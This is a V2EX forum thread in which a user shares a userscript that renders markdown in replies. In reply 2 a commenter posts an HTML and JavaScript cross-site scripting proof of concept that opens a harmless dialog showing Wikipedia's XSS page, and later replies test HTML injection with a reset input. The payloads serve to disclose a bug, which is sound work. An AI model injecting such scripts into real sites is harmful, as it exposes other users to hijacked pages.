V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
爱意满满的作品展示区。
gIrl1990
V2EX  ›  分享创造

撸了一个 for V2EX 的 UserScript . 回复 markdown+点赞排序

  •  
  •   gIrl1990 · 2019-10-17 00:31:35 +08:00 · 3651 次点击
    这是一个创建于 1625 天前的主题,其中的信息可能已经有所发展或是发生改变。
    1. 先安装一个脚本管理器: https://greasyfork.org/zh-CN/help/installing-user-scripts#home-step-1

    2. 然后来这里安装该脚本: https://github.com/gMan1990/userscripts <<点情详多更


    alt alt

    7 条回复    2019-10-29 14:22:34 +08:00
    lxk11153
        1
    lxk11153  
       2019-10-18 02:43:35 +08:00
    /t/609996 过来了。试用了下,还行
    blueset
        2
    blueset  
       2019-10-18 10:53:02 +08:00
    好像发现了一点问题的样子。

    <link rel="stylesheet" href="https://code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css?">
    <script src="https://code.jquery.com/jquery-1.12.4.js?"></script>
    <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js?"></script>
    <div id="dialog157138639" title="Cross-site scripting – Wikipedia">
    <iframe style="margin: -0.5em -1em; width: 100%; height: 100%; box-sizing: border-box;" src="https://en.wikipedia.org/wiki/Cross-site_scripting?"></iframe>
    </div>
    <script>
    $( function() {
    $( "#dialog157138639" ).dialog({
    position: { my: "right bottom", at: "right bottom", of: window },
    width: window.innerWidth / 2,
    height: window.innerHeight / 2
    });
    } );
    </script>
    lxk11153
        3
    lxk11153  
       2019-10-18 14:08:06 +08:00
    @blueset 你后面那一大堆是啥?想 xss 吗
    blueset
        4
    blueset  
       2019-10-18 18:55:35 +08:00 via Android
    @lxk11153 正是。
    lxk11153
        5
    lxk11153  
       2019-10-18 18:57:50 +08:00
    @blueset 看他昨晚更新了呀,fix xss 的
    lxk11153
        6
    lxk11153  
       2019-10-29 11:43:24 +08:00
    &lt;input type="reset"&gt;<input type="reset">
    lxk11153
        7
    lxk11153  
       2019-10-29 14:22:34 +08:00
    &lt;input type=&quot;reset&quot;&gt;<input type="reset">
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   1042 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 27ms · UTC 22:36 · PVG 06:36 · LAX 15:36 · JFK 18:36
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.